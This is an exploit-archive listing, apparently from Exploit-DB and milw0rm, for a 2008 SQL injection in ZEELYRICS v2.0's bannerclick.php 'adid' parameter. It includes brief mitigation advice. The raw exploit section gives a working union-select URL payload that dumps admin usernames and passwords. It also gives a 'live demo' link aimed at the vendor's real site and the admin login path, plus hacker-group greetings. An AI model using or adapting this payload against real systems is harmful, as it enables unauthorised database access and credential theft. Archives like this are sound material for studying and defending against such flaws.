ZEELYRICS v2.0 (bannerclick.php adid) Remote SQL Injection Vulnerability

vendor:

ZEELYRICS

by:

Hussin X

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: ZEELYRICS

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE: N/A

CPE: a:zeeways:zeeways_zeefullyrics:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

ZEELYRICS v2.0 (bannerclick.php adid) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This can allow the attacker to execute arbitrary SQL commands on the underlying database, potentially allowing the attacker to access sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

|___________________________________________________|
|
| ZEELYRICS v2.0 (bannerclick.php adid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home : IQ-SecuritY  >   www.IQ-tY.com
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
| script http://zeeways.com/main/products/ZEELYRICS-v2.0.html
|
|___________________________________________________|

Exploit: 
________



www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--




L!VE DEMO:
_________


http://www.zeelyrics.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--





___________________


Admin  LogiN :

www.[target].com/Script/admin/


____________________________( Greetz )_________________________________
|
|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|     FAHD | Iraqihack  | str0ke | Cyber-Zone
|_____________________________________________________________________


                       Im IRAQi

# milw0rm.com [2008-09-28]